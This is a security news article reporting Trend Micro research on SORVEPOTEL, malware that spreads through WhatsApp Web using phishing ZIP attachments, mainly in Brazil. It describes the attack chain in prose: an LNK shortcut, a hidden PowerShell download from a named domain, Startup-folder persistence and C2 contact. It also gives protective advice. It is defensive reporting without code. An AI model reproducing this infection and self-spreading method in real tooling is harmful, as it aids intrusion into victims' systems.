Malware Spreads Through Malicious WhatsApp Attachments
According to Trend Micro researchers Jeffrey Francis Bonaobra, Maristel Policarpio, Sophia Nilette Robles, Cj Arsley Mateo, Jacob Santos, and Paul John Bardon, SORVEPOTEL spreads via phishing messages containing malicious ZIP file attachments sent through WhatsApp.
“SORVEPOTEL has been observed to spread across Windows systems through convincing phishing messages with malicious ZIP file attachments,” the researchers explained. “Interestingly, the phishing message requires users to open it on a desktop, suggesting that threat actors might be more interested in targeting enterprises rather than consumers.”
Once the infected ZIP file is opened, the malware automatically propagates through the desktop web version of WhatsApp. This behavior results in affected accounts being banned for excessive spam activity. Trend Micro has found no evidence that the attackers are exfiltrating data or deploying ransomware.
Brazil Hit Hardest by the SORVEPOTEL Campaign
Out of the 477 recorded infections, a significant majority — 457 cases — have been identified in Brazil. The most affected industries include government, public service, manufacturing, technology, education, and construction.
The attack begins with a phishing message sent from an already compromised contact, lending it credibility. The attached ZIP file masquerades as a legitimate receipt or health-related document, tricking users into opening it on their desktop systems.
Technical Details: PowerShell and Persistence Mechanisms
Upon opening the ZIP file, users are prompted to launch a Windows shortcut (LNK) file. When executed, the shortcut triggers a hidden PowerShell script that downloads the main malware payload from a remote server (for example, sorvetenopoate[.]com).
The downloaded payload is a batch script that copies itself into the Windows Startup folder to ensure it runs automatically after each system reboot. It also executes a PowerShell command that connects to a remote command-and-control (C2) server to receive additional instructions or payloads.
WhatsApp Propagation Mechanism
The standout feature of SORVEPOTEL is its ability to spread through WhatsApp Web. If the malware detects that WhatsApp Web is active on the infected computer, it automatically sends the malicious ZIP file to all the user’s contacts and groups. This self-spreading technique enables rapid propagation with minimal user interaction.
“This automated spreading results in a high volume of spam messages and frequently leads to account suspensions or bans due to violations of WhatsApp’s terms of service,” Trend Micro said.
Growing Trend of Malware Leveraging Communication Platforms
The SORVEPOTEL campaign highlights a growing trend in cybercrime — attackers increasingly exploiting trusted communication platforms to maximize reach. By leveraging popular tools like WhatsApp, threat actors can achieve rapid, large-scale infection with little to no user engagement.
“The SORVEPOTEL campaign demonstrates how threat actors are increasingly leveraging popular communication platforms like WhatsApp to achieve rapid, large-scale malware propagation with minimal user interaction,” Trend Micro concluded.
Protecting Against SORVEPOTEL and Similar Threats
- Avoid opening ZIP or LNK attachments from unknown or unexpected senders, even if they appear to come from trusted contacts.
- Use endpoint protection and keep your antivirus software up to date.
- Verify suspicious messages through a different communication channel before opening attachments.
- Ensure your Windows systems and PowerShell configurations follow security best practices.
As messaging platforms continue to be targeted for malware distribution, both enterprises and individual users must stay alert to phishing and social engineering tactics designed to exploit trust and familiarity.
